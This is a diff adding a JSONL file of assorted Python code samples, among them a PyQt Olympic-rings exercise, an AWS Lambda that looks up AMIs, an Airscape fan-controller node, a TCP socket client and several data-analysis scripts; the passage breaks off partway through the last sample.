diff --git "a/4037.jsonl" "b/4037.jsonl"
new file mode 100644
--- /dev/null
+++ "b/4037.jsonl"
@@ -0,0 +1,761 @@
+{"seq_id":"290065905","text":"import sys\r\nfrom PyQt5.QtGui import QPainter, QPen, QBrush\r\nfrom PyQt5.QtWidgets import QWidget, QApplication\r\nfrom PyQt5.QtCore import Qt, QRect\r\n\r\nclass Olympic(QWidget):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n # initialize additional attributes as needed here.\r\n self.setGeometry(300, 300, 550, 600)\r\n self.setWindowTitle('Olympic Rings')\r\n self.__yellowblue = False\r\n self.__yellowblack = False\r\n self.__greenblack = False\r\n self.__greenred = False\r\n self.__blue = False\r\n self.__yellow = False\r\n self.__black = False\r\n self.__green = False\r\n self.__red = False\r\n self.__Rect = QRect(230,80,140,50)\r\n self.__half1 = QRect(230,80,70,50)\r\n self.__half2 = QRect(300,80,70,50)\r\n self.show() # this should be the last line of your constructor.\r\n \r\n def inCirc(self,a,b,x,y):\r\n return ((((a - x)**2) + (b - y)**2)**(1/2) < 60)\r\n \r\n def mousePressEvent(self, event):\r\n if(self.inCirc(160,300,event.x(),event.y())) and (self.inCirc(230,370,event.x(),event.y())):\r\n self.__yellowblue = True\r\n elif(self.inCirc(300,300,event.x(),event.y())) and (self.inCirc(230,370,event.x(),event.y())):\r\n self.__yellowblack = True\r\n elif(self.inCirc(370,370,event.x(),event.y())) and (self.inCirc(300,300,event.x(),event.y())):\r\n self.__greenblack = True\r\n elif(self.inCirc(370,370,event.x(),event.y())) and (self.inCirc(450,310,event.x(),event.y())):\r\n self.__greenred = True\r\n elif(self.inCirc(160,300,event.x(),event.y())):\r\n self.__blue = True\r\n elif(self.inCirc(240,380,event.x(),event.y())):\r\n self.__yellow = True\r\n elif(self.inCirc(300,300,event.x(),event.y())):\r\n self.__black = True\r\n elif(self.inCirc(370,370,event.x(),event.y())):\r\n self.__green = True\r\n elif(self.inCirc(450,310,event.x(),event.y())):\r\n self.__red = True\r\n self.update()\r\n \r\n def paintEvent(self, event):\r\n qp = QPainter()\r\n qp.begin(self)\r\n # draw things here\r\n blackPen = QPen(QBrush(Qt.black),8)\r\n bluePen = QPen(QBrush(Qt.blue),8)\r\n redPen = QPen(QBrush(Qt.red),8)\r\n yellowPen = QPen(QBrush(Qt.yellow),8)\r\n greenPen = QPen(QBrush(Qt.green),8)\r\n qp.setPen(blackPen)\r\n qp.drawEllipse(240,240,120,120)\r\n qp.setPen(bluePen)\r\n qp.drawEllipse(100,240,120,120)\r\n qp.setPen(redPen)\r\n qp.drawEllipse(380,240,120,120)\r\n qp.setPen(yellowPen)\r\n qp.drawEllipse(170,310,120,120)\r\n qp.setPen(greenPen)\r\n qp.drawEllipse(310,310,120,120)\r\n if(self.__yellowblue):\r\n qp.fillRect(self.__half1,QBrush(Qt.blue))\r\n qp.fillRect(self.__half2,QBrush(Qt.yellow))\r\n self.__yellowblue = False\r\n elif(self.__yellowblack):\r\n qp.fillRect(self.__half1,QBrush(Qt.yellow))\r\n qp.fillRect(self.__half2,QBrush(Qt.black))\r\n self.__yellowblack = False\r\n elif(self.__greenblack):\r\n qp.fillRect(self.__half1,QBrush(Qt.black))\r\n qp.fillRect(self.__half2,QBrush(Qt.green))\r\n self.__greenblack = False\r\n elif(self.__greenred):\r\n qp.fillRect(self.__half1,QBrush(Qt.green))\r\n qp.fillRect(self.__half2,QBrush(Qt.red))\r\n self.__greenred = False\r\n elif(self.__blue):\r\n qp.fillRect(self.__Rect,QBrush(Qt.blue))\r\n self.__blue = False\r\n elif(self.__yellow):\r\n qp.fillRect(self.__Rect,QBrush(Qt.yellow))\r\n self.__yellow = False\r\n elif(self.__black):\r\n qp.fillRect(self.__Rect,QBrush(Qt.black))\r\n self.__black = False\r\n elif(self.__green):\r\n qp.fillRect(self.__Rect,QBrush(Qt.green))\r\n self.__green = 
False\r\n elif(self.__red):\r\n qp.fillRect(self.__Rect,QBrush(Qt.red))\r\n self.__red = False\r\n else:\r\n qp.eraseRect(self.__Rect)\r\n qp.setPen(bluePen)\r\n qp.drawArc(100,240,120,120,-230,100)\r\n qp.setPen(blackPen)\r\n qp.drawArc(240,240,120,120,-240,100)\r\n qp.drawArc(240,240,120,120,-1680,100)\r\n qp.setPen(redPen)\r\n qp.drawArc(380,240,120,120,-1650,100)\r\n qp.end()\r\n\r\n# DO NOT MODIFY BELOW THIS LINE\r\nif __name__ == '__main__': \r\n app = QApplication(sys.argv)\r\n ex = Olympic()\r\n sys.exit(app.exec_())","sub_path":"project3/Olympic.py","file_name":"Olympic.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"495550622","text":"##python2\nimport os\nimport sys\nimport boto3\nimport json\nimport threading\nimport logging\nimport urllib3\n#from functools import cmp_to_key\n\nCFN_SUCCESS = \"SUCCESS\"\nCFN_FAILED = \"FAILED\"\n\nclass my_version(str):\n def __init__(self, str_version):\n version = str_version.split('.')\n self.major = self.minor = self.patch = 0\n if len(version) >= 1:\n self.major = int(version[0])\n if len(version) >= 2:\n self.minor = int(version[1])\n if len(version) >= 3:\n self.patch = int(version[2])\n\n#input: {'name': 'xx', 'ami_id': 'xx', 'version': 'x.y.z'}\ndef mycmp(x, y):\n xv = my_version(x['version'])\n yv = my_version(y['version'])\n ret = xv.major - yv.major\n if 0 != ret:\n return ret\n ret = xv.minor - yv.minor\n if 0 != ret:\n return ret\n ret = xv.patch - yv.patch\n return ret\n\ndef find_amis(filters):\n client = boto3.client('ec2')\n #resp = client.describe_images(Owners=['aws-marketplace'], Filters=filters)\n resp = client.describe_images(Filters=filters)\n all_images = resp['Images']\n ret_list = []\n for image in all_images:\n ret_list.append({'name':image['Name'], 'ami_id': image['ImageId']})\n return ret_list\n\ndef find_custom_ami(ami_name):\n filters = []\n filters.append({'Name': 'name', 'Values': [ami_name]})\n image_list = find_amis(filters)\n if len(image_list) <= 0:\n msg = 'Can not found custom AMI! ami_name: %s' % (ami_name)\n raise Exception(msg)\n image = image_list[0]\n image['version'] = 'x.x.x'\n return image\n\ndef find_latest(pay_type, ami_name=None):\n if None != ami_name:\n return find_custom_ami(ami_name)\n filters = []\n filters.append({'Name': 'owner-alias', 'Values': ['aws-marketplace']})\n filters.append({'Name': 'is-public', 'Values': ['true']})\n filters.append({'Name': 'name', 'Values': ['*FortiWeb-AWS-*%s*' % (pay_type)]})\n image_list = find_amis(filters)\n if len(image_list) <= 0:\n msg = 'Can not found latest AMI! 
type: %s' % pay_type\n raise Exception(msg)\n for image in image_list:\n version = image['name'].split('FortiWeb-AWS-')[1].split(pay_type)[0]\n image['version'] = version\n #image_list.sort(key=cmp_to_key(mycmp))\n image_list.sort(mycmp)\n print('pay_type(%s) ami list: %s' % (pay_type, image_list))\n return image_list[-1]\n\ndef find_byol_latest(byol_ami_name=None):\n return find_latest('_BYOL', byol_ami_name)\n\ndef find_on_demand_latest(on_demand_ami_name=None):\n return find_latest('_OnDemand', on_demand_ami_name)\n\ndef cfn_send(evt, context, responseStatus, respData, reason=''):\n respUrl = evt['ResponseURL']\n print(respUrl)\n respBody = {}\n respBody['Status'] = responseStatus\n respBody['Reason'] = reason + '\\nSee the details in CloudWatch:' + context.log_group_name + ',' + context.log_stream_name\n respBody['PhysicalResourceId'] = context.log_stream_name\n respBody['StackId'] = evt['StackId']\n respBody['RequestId'] = evt['RequestId']\n respBody['LogicalResourceId'] = evt['LogicalResourceId']\n respBody['NoEcho'] = None\n respBody['Data'] = respData\n\n json_respBody = json.dumps(respBody)\n print(\"Response to cloudformation:\\n\" + json_respBody)\n headers = {'content-type' : '', 'content-length' : str(len(json_respBody)) }\n try:\n http = urllib3.PoolManager()\n response = http.request('PUT', respUrl, headers=headers, body=json_respBody)\n print(\"cloudformation status code: %s\" % (response.status))\n print(\"cloudformation return body: %s\" %(response.data.decode('utf-8')))\n except Exception as e:\n print(\"send(..) failed sending response: \" + str(e))\n raise\n\ndef timeout(event, context):\n logging.error('Time out, failure response to CloudFormation')\n cfn_send(event, context, CFN_FAILED, {}, 'fwb labmda timeout')\n\ndef handler(event, context):\n print('event: %s' % json.dumps(event))\n status = CFN_SUCCESS\n respData = {}\n err_msg = 'no error'\n if event['RequestType'] not in ['Create', 'Update']:\n cfn_send(event, context, status, respData, err_msg)\n return\n # make sure we send a failure to CloudFormation if the function is going to timeout\n timer = threading.Timer((context.get_remaining_time_in_millis() / 1000.00) - 0.5, timeout, args=[event, context])\n timer.start()\n rpt = event['ResourceProperties']\n byol_needed = True\n on_demand_needed = True\n byol_ami_name = None\n on_demand_ami_name = None\n if 'BYOLNeeded' in rpt and rpt['BYOLNeeded'].strip().startswith('n'):\n byol_needed = False\n if 'OnDemandNeeded' in rpt and rpt['OnDemandNeeded'].strip().startswith('n'):\n on_demand_needed = False\n if 'BYOLAMIName' in rpt and len(rpt['BYOLAMIName'].lstrip().rstrip()) > 0:\n byol_ami_name = rpt['BYOLAMIName']\n if 'OnDemandAMIName' in rpt and len(rpt['OnDemandAMIName'].lstrip().rstrip()) > 0:\n on_demand_ami_name = rpt['OnDemandAMIName']\n try:\n print('try to find ami id')\n if True == byol_needed:\n print('BYOL needed')\n image_info = find_byol_latest(byol_ami_name)\n respData['LatestBYOLAmiId'] = image_info['ami_id']\n respData['LatestBYOLAmiVersion'] = image_info['version']\n else:\n print('BYOL not needed')\n respData['LatestBYOLAmiId'] = 'i-not-required'\n respData['LatestBYOLAmiVersion'] = '0.0.0'\n if True == on_demand_needed:\n print('OnDemand needed')\n image_info = find_on_demand_latest(on_demand_ami_name)\n respData['LatestOnDemandAmiId'] = image_info['ami_id']\n respData['LatestOnDemandAmiVersion'] = image_info['version']\n else:\n print('OnDemand not needed')\n respData['LatestOnDemandAmiId'] = 'i-not-required'\n 
respData['LatestOnDemandAmiVersion'] = '0.0.0'\n except Exception as e:\n err_msg = 'exception: %s' % (str(e))\n status = CFN_FAILED\n finally:\n timer.cancel()\n cfn_send(event, context, status, respData, err_msg)\n\nif '__main__' == __name__:\n event = {}\n class fake_context: pass\n fake_context.get_remaining_time_in_millis = lambda self: 2*60*1000\n event['RequestType'] = 'Create'\n event['ResponseURL'] = 'http://127.0.0.1:3000'\n event['StackId'] = 'StackId'\n event['RequestId'] = 'RequestId'\n event['LogicalResourceId'] = 'LogicalResourceId'\n event['ResourceProperties'] = {}\n event['ResourceProperties']['BYOLAMIName'] = ''\n event['ResourceProperties']['OnDemandAMIName'] = ''\n #event['ResourceProperties']['BYOLNeeded'] = 'n'\n event['ResourceProperties']['BYOLNeeded'] = 'y'\n #event['ResourceProperties']['OnDemandNeeded'] = 'n'\n event['ResourceProperties']['OnDemandNeeded'] = 'y'\n context = fake_context()\n context.log_group_name = 'log_group'\n context.log_stream_name = 'log_stream'\n handler(event, context)\n\n","sub_path":"aws/lambda/find_ami.py","file_name":"find_ami.py","file_ext":"py","file_size_in_byte":6972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"418467949","text":"\n\n#\n# Airscape API Doc: https://blog.airscapefans.com/archives/gen-2-controls-api\n#\n# TODO:\n# - Nothing\n#\nimport polyinterface\nimport time\nfrom pgSession import pgSession\n\nLOGGER = polyinterface.LOGGER\n\nclass Airscape2(polyinterface.Node):\n\n def __init__(self, controller, primary, address, name, config_data):\n super(Airscape2, self).__init__(controller, primary, address, name)\n self.config_data = config_data\n self.debug_level = 1\n self.do_poll = False # Don't let shortPoll happen during initialiation\n self.watching_door = False\n self.status = {}\n self.driver = {}\n\n def start(self):\n self.setDriver('GV1', 0)\n self.l_info('start', 'config={}'.format(self.config_data))\n self.host = self.config_data['host']\n self.session = pgSession(self,self.name,LOGGER,self.host,debug_level=self.debug_level)\n self.query()\n self.do_poll = True\n\n def shortPoll(self):\n self.l_debug('shortPoll', '...')\n if not self.watching_door:\n self.poll()\n\n def longPoll(self):\n pass\n\n def poll(self):\n res = self.session.get('status.json.cgi',{},parse=\"json\")\n self.set_from_response(res)\n\n def wait_for_response(self):\n # Poll until we have a status\n while not (self.st):\n self.l_debug(\"wait_for_response\",\"\")\n self.poll()\n time.sleep(1)\n\n # XREF from airscape to drivers\n all_dinfo = {\n 'fanspd': 'ST',\n 'attic_temp': 'CLITEMP',\n 'timeremaining': 'TIMEREM',\n 'power': 'CPW',\n 'doorinprocess': 'GV2',\n 'cfm': 'GV3',\n 'house_temp': 'GV4',\n 'oa_temp': 'GV5',\n 'interlock1': 'GV6',\n 'interlock2': 'GV7'\n }\n # xref from setfanspd to status.cgi. 
Why are the different???\n all_xref = {\n 'attic': 'attic_temp',\n 'inside': 'house_temp',\n 'oa': 'oa_temp'\n }\n def set_from_response(self,res):\n self.l_debug('set_from_response',\"In: {}\".format(res))\n self.st = self.check_response(res)\n self.setDriver('GV1',1 if self.st else 0)\n if self.st:\n rdata = res['data']\n for key, value in self.all_xref.items():\n if key in rdata:\n rdata[value] = rdata[key]\n for key, driver in self.all_dinfo.items():\n if key in rdata:\n self.status[key] = rdata[key]\n if key == 'fanspd':\n dval = int(rdata[key]) * 10 # *10 if zwave and 1 if Insteon\n else:\n dval = rdata[key]\n self.setDriver(driver,dval)\n # Wait for the door if we are not watching it already\n if not self.watching_door:\n self.watch_door()\n self.l_debug('set_from_response',\"Out: {}\".format(self.status))\n\n def check_response(self,res):\n if res is not False and 'code' in res and res['code'] == 200:\n if 'data' in res and res['data'] is not False:\n return True\n else:\n self.l_error('check_response', 'Got good code: {}'.format(res))\n return False\n\n def watch_door(self):\n cnt = 0\n while int(self.status['doorinprocess']) == 1:\n if cnt > 60:\n self.l_error('watch_door', 'Timeout waiting for door to open?')\n break\n self.watching_door = True\n self.l_debug('watch_door', 'st={}'.format(self.status['doorinprocess']))\n time.sleep(1)\n cnt += 1\n self.poll()\n self.watching_door = False\n self.l_debug('watch_door', 'st={}'.format(self.status['doorinprocess']))\n\n def query(self):\n self.poll()\n self.reportDrivers()\n\n def setDriver(self,driver,value):\n self.driver[driver] = value\n super(Airscape2, self).setDriver(driver,value)\n\n def getDriver(self,driver):\n if driver in self.driver:\n return self.driver[driver]\n else:\n return super(Airscape2, self).getDriver(driver)\n\n def setOnI(self, command):\n val = command.get('value')\n self.l_info('setOn','val={}'.format(val))\n if val is None:\n speed = 5 # Medium\n else:\n val = int(val)\n if val == 0:\n self.setOff({})\n return\n elif val == 255:\n # Insteon High\n speed = 10\n elif val == 253:\n # Inston Medium\n speed = 5\n elif val == 127:\n # Insteon Medium\n speed = 3\n elif val > 10:\n self.l_error('setOn','Illegal value {}'.format(val))\n return\n self.setSpeed(speed)\n\n def setOnZW(self, command):\n val = command.get('value')\n self.l_info('setOn','val={}'.format(val))\n if val is None:\n speed = 4\n else:\n val = int(val)\n if val == 0:\n self.setOff({})\n return\n elif val > 90:\n # High\n speed = 10\n elif val > 80:\n # MediumHigh\n speed = 9\n elif val > 80:\n # Medium\n speed = 8\n elif val > 60:\n # Medium\n speed = 7\n elif val > 50:\n # Medium\n speed = 6\n elif val > 40:\n # Medium\n speed = 5\n elif val > 30:\n # Medium\n speed = 4\n elif val > 20:\n # Medium\n speed = 3\n elif val > 10:\n # Medium\n speed = 2\n elif val > 0:\n # Low\n speed = 1\n self.setSpeed(speed)\n\n def setOff(self, command):\n self.l_info('setOff','')\n # The data returned by fanspd is not good xml\n res = self.session.get('fanspd.cgi',{'dir': 4},parse=\"axml\")\n self.set_from_response(res)\n\n def speedDown(self, command):\n self.l_info('speedDown','')\n # The data returned by fanspd is not good xml\n res = self.session.get('fanspd.cgi',{'dir': 3},parse=\"axml\")\n self.set_from_response(res)\n\n def speedUp(self, command):\n self.l_info('speedUp','')\n # The data returned by fanspd is not good xml\n res = self.session.get('fanspd.cgi',{'dir': 1},parse=\"axml\")\n self.set_from_response(res)\n\n def addHour(self, command):\n # The 
data returned by fanspd is not good xml\n res = self.session.get('fanspd.cgi',{'dir': 2},parse=\"axml\")\n self.set_from_response(res)\n\n def setSpeed(self,val):\n self.l_info('setSpeed','{}'.format(val))\n if not self.do_poll:\n self.l_debug('setSpeed', 'waiting for startup to complete')\n while not self.do_poll:\n time.sleep(1)\n if val == 0:\n self.setOff('')\n else:\n self.wait_for_response()\n if 'fanspd' in self.status:\n while val > int(self.status['fanspd']):\n self.l_info(\"_setSpeed\",\"current={} request={}\".format(int(self.status['fanspd']),val))\n self.speedUp({})\n time.sleep(1)\n while val < int(self.status['fanspd']):\n self.l_info(\"_setSpeed\",\"current={} request={}\".format(int(self.status['fanspd']),val))\n self.speedDown({})\n time.sleep(1)\n self.l_info(\"_setSpeed\",\"current={} request={}\".format(int(self.status['fanspd']),val))\n else:\n self.l_error('setSpeed', 'Called before we know the current fanspd, that should not be possible')\n\n def l_info(self, name, string):\n LOGGER.info(\"%s:%s:%s: %s\" % (self.id,self.name,name,string))\n\n def l_error(self, name, string):\n LOGGER.error(\"%s:%s:%s: %s\" % (self.id,self.name,name,string))\n\n def l_warning(self, name, string):\n LOGGER.warning(\"%s:%s:%s: %s\" % (self.id,self.name,name,string))\n\n def l_debug(self, name, string):\n LOGGER.debug(\"%s:%s:%s: %s\" % (self.id,self.name,name,string))\n\n drivers = [\n {'driver': 'ST', 'value': 0, 'uom': 25}, # speed\n {'driver': 'CLITEMP', 'value': 0, 'uom': 17}, # attic_temp\n {'driver': 'TIMEREM', 'value': 0, 'uom': 56}, # minutes\n {'driver': 'CPW', 'value': 0, 'uom': 73}, # watt?\n {'driver': 'GV1', 'value': 0, 'uom': 2}, # Online\n {'driver': 'GV2', 'value': 0, 'uom': 2}, # doorinprocess\n {'driver': 'GV3', 'value': 0, 'uom': 7}, # cfm\n {'driver': 'GV4', 'value': 0, 'uom': 17}, # house_temp\n {'driver': 'GV5', 'value': 0, 'uom': 17}, # oa_temp\n {'driver': 'GV6', 'value': 0, 'uom': 56}, # interlock1\n {'driver': 'GV7', 'value': 0, 'uom': 56}, # interlock2\n\n ]\n id = 'airscape2_F'\n commands = {\n 'FDUP': speedUp,\n 'FDDOWN': speedDown,\n 'DOF': setOff,\n 'DON' : setOnZW,\n 'ADD_HOUR': addHour,\n }\n \"\"\"\n Used 4.17.x.x because Benoit said this for the portal:\n GH will use these settings to set/read the fan speeds.\n const fanSpeedsDef = {\n // This is for fanlinc (Insteon, type 1.x.x.x)\n 255: [\n {name: 'Off', maxSpeed: 0},\n {name: 'Low', maxSpeed: 127}, // 1% - 49% / Low\n {name: 'Medium', maxSpeed: 253}, // 50% - 99% / Medium\n {name: 'High', maxSpeed: 255}, // 100% / High\n ],\n // This is for fans using ZWave (type 4.16.x.x)\n 100: [\n {name: 'Off', maxSpeed: 0},\n {name: 'Low', maxSpeed: 24}, // 1% - 24% / Low\n {name: 'Medium', maxSpeed: 49}, // 25% - 49% / Medium\n {name: 'MediumHigh', maxSpeed: 74}, // 50% - 74% / Medium-High\n {name: 'High', maxSpeed: 100}, // 75-100% / High\n ],\n };\n Hints See: https://github.com/UniversalDevicesInc/hints\n \"\"\"\n hint = [4,17,9,1]\n","sub_path":"nodes/Airscape2.py","file_name":"Airscape2.py","file_ext":"py","file_size_in_byte":10171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"470280797","text":"from django.core.mail import send_mail\n\n\ndef send_activation_mail(email, activation_code):\n message = f\"\"\"Спасибо за регистрацию активируйте аккаунт по ссылке:\n http://127.0.0.1:8000/accounts/activation/?u={activation_code}\"\"\"\n send_mail(\n 'Активация аккаунта',\n message,\n 'rest@mysite.com',\n [email, ]\n 
)","sub_path":"account/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"55955622","text":"import numpy as np\n\ndef __corrupt(y, corrupt_indices, threshold):\n for i in corrupt_indices:\n # Corrupt that data with some probability.\n if np.random.uniform() < threshold:\n y[i] = 1 - y[i]\n\n # Return the corrupted response variable.\n return y\n\n\ndef random_corruption(y, gamma, threshold):\n # Calculate number of samples.\n n_samples = len(y)\n \n # Generate corrupt indices.\n corrupt_indices = np.random.choice(n_samples, size = gamma)\n\n # Return the corrupted response variable.\n return __corrupt(y, corrupt_indices, threshold)\n\ndef lowest_log_likelihood_corruption(X, y, beta, gamma, threshold):\n # Calculate number of samples.\n n_samples = len(y)\n\n # Initialize a vector to store the corrupt likelihoods.\n corrupt_likelihood = np.zeros((n_samples, 1)).ravel()\n\n for i in xrange(n_samples):\n # Get this data and corrupt the response.\n X_i, y_i = X[i], 1 - y[i]\n\n # Calculate the log-likelihood for this corrupted term.\n corrupt_likelihood[i] = y_i * (np.dot(beta, X_i)) - np.log(1 + np.exp(np.dot(beta, X_i)))\n\n # Get the indices of the smallest terms.\n corrupt_indices = np.argsort(-corrupt_likelihood)[:gamma]\n\n # Return the corrupted response variable.\n return __corrupt(y, corrupt_indices, threshold)\n","sub_path":"response_variable_corruption.py","file_name":"response_variable_corruption.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"506391903","text":"# %load q06_create_runs_series/build.py\n#Default Imports\nimport pandas as pd\nimport numpy as np\nipl_matches_array =np.genfromtxt('data/ipl_matches_small.csv', dtype='|S50', skip_header=1, delimiter=',')\n\ndef create_runs_series(match_code):\n filter_set = ipl_matches_array[ipl_matches_array[:,0] == match_code]\n delivery = filter_set[:,11]\n runs = filter_set[:,16]\n variable = pd.Series(runs, index = delivery)\n return variable\n#Your Solution\n\ncreate_runs_series(b'392203')\n\n\n\n\n","sub_path":"q06_create_runs_series/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"196132241","text":"# Time Complexity :O(n*2^n) where n is number of candidates\n# Space Complexity : O(n) single temp list\n# Did this code successfully run on Leetcode : yes\n# Any problem you faced while coding this : no\n\n\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n\n self.result = []\n\n if s == None:\n return self.result\n self.backtrack(s, [], 0)\n return self.result\n\n def backtrack(self, s, temp, index):\n if index == len(s):\n # print('resssssssssssss=')\n self.result.append(list(temp))\n\n for i in range(index, len(s)):\n # print('index=',index)\n # print('i=',i)\n\n if self.isPalindrome(s, index, i):\n # print('resssssssssssss=')\n # add from start that is index to i (may i change every for loop)\n temp.append(s[index:i+1])\n # print('temp=',temp)\n self.backtrack(s, temp, i+1)\n # print('------------------------------------------------------')\n # print('tempbbbbbbbbbbb=',temp)\n # after index reaching the end of s, we pop last element\n # print('indexbbbbbbbbbbbbbbbbbbbb=',index)\n # print('i=',i)\n temp.pop()\n # print('done opop')\n\n def isPalindrome(self, s, 
left, right):\n if left == right:\n return True\n while left < right:\n if s[left] != s[right]:\n return False\n left += 1\n right -= 1\n\n return True\n","sub_path":"Problem2.py","file_name":"Problem2.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"253090073","text":"# module that provides utilities for connecting to web addresses and\n# retrieving data from them\nimport urllib2\n\n\ndef main():\n # open a connection to a URL using urllib2\n webUrl = urllib2.urlopen(\"http://joemarini.com\")\n\n # get the result and print it\n print\n \"Result code : \" + str(webUrl.getcode())\n\n # read the data from the URL and print it\n data = webUrl.read()\n print\n data\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python_Up_And_Running/04 - Working with web data/01_fetching_web_data.py","file_name":"01_fetching_web_data.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"284574213","text":"import os\nimport click\nimport pandas as pd\nimport os.path as op\nfrom glob import glob\nfrom niedu.global_utils import get_data_dir\n\n\ndef create_fsl_onset_files(data_dir):\n \"\"\" Creates FSL-style onset files (tab-delimited, without headers). \"\"\"\n subs = sorted(glob(op.join(data_dir, 'sub-03')))\n for sub in subs:\n # first flocBLOCKED and flocER files\n flocs = sorted(glob(op.join(sub, 'ses-*', 'func', '*floc*_events.tsv')))\n\n for floc in flocs:\n df = pd.read_csv(floc, sep='\\t')\n conds = np.unique(df['trial_type'])\n for con in conds:\n f_out = floc.replace('_events.tsv', f'_condition-{con}_events.txt')\n #if op.isfile(f_out):\n # continue\n\n tmp = df.query(\"trial_type == @con\").copy()\n tmp.loc[:, 'weight'] = 1\n tmp.loc[:, 'duration'] = tmp.loc[:, 'duration'].round(1)\n tmp = tmp.loc[:, ['onset', 'duration', 'weight']] # reorder\n tmp.to_csv(f_out, header=False, index=False, sep='\\t')\n\n\n@click.command()\n@click.option('--datadir', default=None, help='Directory with data')\n@click.option('--fsldir', default=None, help='FSL directory')\ndef api(datadir, fsldir):\n \n if datadir is None:\n datadir = get_data_dir()\n \n if not os.path.isdir(datadir):\n raise ValueError(f\"Datadir {datadir} does not exist!\")\n\n print(f\"Found {datadir} with data!\")\n create_fsl_onset_files(datadir)\n\n\n\nif __name__ == '__main__':\n api()\n","sub_path":"post_install.py","file_name":"post_install.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"536762318","text":"#!/usr/bin/env python\n\nimport os;\nimport sys;\nfrom socket import *;\nfrom select import select;\nsys.path.append(\"..\");\nfrom common.CodeEngine import CodeEngine;\n\nclass TCPSocket(object):\n\tdef __init__(self, host, port):\n\t\tself.host = host;\n\t\tself.port = port;\n\t\tself.socket_fd = socket(AF_INET, SOCK_STREAM, 0);\n\t\tself.connected = False;\n\t\tself.recv_buffer = '';\n\n\tdef is_connected(self):\n\t\treturn self.connected;\n\n\tdef connect(self):\t\n\t\ttry:\n\t\t\tself.socket_fd.connect((self.host, self.port));\n\t\texcept:# socket.error, e:\n\t\t\tpass;\n\t\telse:\n\t\t\t#print \"connect to server(host: %s, port:%d) success\" % (self.host, self.port);\n\t\t\tself.connected = True;\n\t\treturn self.is_connected();\n\n\tdef disconnect(self):\n\t\tself.socket_fd.close();\n\t\tself.connected = False;\t\n\t\n\tdef 
send_data(self, bstr):\n\t\tif self.is_connected():\n\t\t\tself.socket_fd.send(bstr);\n\t\t\t#print \"send data(len = %d) sucess\\n\" % len(bstr);\n\n\tdef recv_data(self):\n\t\tif self.is_connected():\n\t\t\trs,ws,es = select([self.socket_fd], [], [], 1);\n\t\t\tif es:\n\t\t\t\tself.disconnect();\n\t\t\t\t#print \"closed by peer\";\n\t\t\tif rs:\n\t\t\t\ttry:\n\t\t\t\t\tdata = self.socket_fd.recv(1024);\n\t\t\t\t\tif data:\n\t\t\t\t\t\t#print \"recv data(%d): %s\" % (len(data), data);\n\t\t\t\t\t\tself.recv_buffer = self.recv_buffer + data;\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.disconnect();\n\t\t\t\t\t\t#print \"closed by peer...\";\n\t\t\t\texcept:\n\t\t\t\t\tself.disconnect();\n\t\n\tdef get_one_package(self):\n\t\tif len(self.recv_buffer) > 4:\n\t\t\tpkg_len = CodeEngine.decode_int32(self.recv_buffer);\n\t\t\t#print \"pkg len : %d, total len : %d\" % (pkg_len, len(self.recv_buffer));\n\t\t\tif pkg_len <= len(self.recv_buffer):\n\t\t\t\tcode = self.recv_buffer[:pkg_len];\n\t\t\t\tself.recv_buffer = self.recv_buffer[pkg_len:];\n\t\t\t\treturn code;\n\t\treturn None;\n\t\t\t\t\n\nif __name__ == '__main__':\n\tts = TCPSocket('10.0.128.203', 20001);\n\tts.connect();\n\ttime.sleep(10);\n\tts.recv_data();\n\tts.recv_data();\n\n","sub_path":"Server/python/service_check/TCPSocket.py","file_name":"TCPSocket.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"118388029","text":"#!/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom optparse import OptionParser\nimport pymongo\nimport sys\n\nimport nltk\n\nimport omexp.experiment.reviewquery as reviewquery\nimport six\n\nALL_DOMAINS = ['AMZN_Apparel',\n 'AMZN_Books',\n 'AMZN_Electronics',\n 'AMZN_Music',\n 'Health',\n 'IMDB',\n 'Network',\n 'Pet',\n 'Software',\n 'Tripadvisor',\n 'auto',\n 'baby',\n 'diy',\n 'jewel',\n 'office',\n 'patio',\n 'toys',\n 'finefoods'\n]\n\n\ndef rolling(cur_avg, n, value):\n return ((n - 1.0) * cur_avg + value) / n\n\n\ndef compute(dataset):\n # Execute selected test\n n = 1.0\n sentcnt = 1.0\n ds = {'tokens': 0.0, 'words': 0.0, 'unique': 0.0, 'sentences': 0.0, 'sent_size': 0.0}\n for rec in reviewquery.get_reviews([dataset]):\n ds['words'] = rolling(ds['words'], n, rec['words'])\n ds['unique'] = rolling(ds['unique'], n, rec['unique_words'])\n cur_sent = nltk.sent_tokenize(rec['text'])\n ds['tokens'] = rolling(ds['tokens'], n, len(nltk.word_tokenize(rec['text'])))\n ds['sentences'] = rolling(ds['sentences'], n, len(cur_sent))\n for sent in cur_sent:\n sz = len(nltk.word_tokenize(sent))\n ds['sent_size'] = rolling(ds['sent_size'], sentcnt, sz)\n sentcnt += 1.0\n n += 1.0\n\n ds['docs'] = (n - 1)/2\n return ds\n\n\nif __name__ == '__main__':\n # grab parameters\n mainparser = OptionParser()\n mainparser.add_option('--dataset', action='store', type='string', default=None, dest='dataset',\n help='Dataset to get stats')\n mainparser.add_option('--latex', action='store_true', default=False, dest='latex', help='Output latex columns')\n (options, args) = mainparser.parse_args()\n\n if not 